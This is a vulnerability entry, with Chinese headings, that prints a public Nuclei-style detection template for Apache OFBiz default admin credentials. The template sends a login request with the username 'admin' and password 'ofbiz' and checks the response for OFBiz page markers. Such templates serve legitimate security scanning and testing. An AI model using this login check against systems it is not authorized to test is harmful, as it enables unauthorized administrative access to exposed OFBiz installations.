漏洞描述
Apache OfBiz default admin credentials were discovered.
ofbiz-default-login: Apache OfBiz Default Login
PoC代码[已公开]
id: ofbiz-default-login
info:
name: Apache OfBiz Default Login
author: pdteam
severity: high
description: Apache OfBiz default admin credentials were discovered.
reference:
- https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
tags: ofbiz,default-login,apache,vuln
http:
- raw:
- |
POST /control/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
USERNAME={{username}}&PASSWORD={{password}}&FTOKEN=&JavaScriptEnabled=Y
payloads:
username:
- admin
password:
- ofbiz
attack: pitchfork
matchers:
- type: word
words:
- "ofbiz-pagination-template"
- "<span>Powered by OFBiz</span>"
condition: and
# digest: 4a0a004730450221008fba84db769e6c0518f9668f9dca1adf4c6a25d6a8b499c0351c21747221b64102202b5d4d4f85ec14be61e4c0eeb8334e345074c2bd88f1f0711d0e47dee1881217:922c64590222798bb761d5b6d8e72950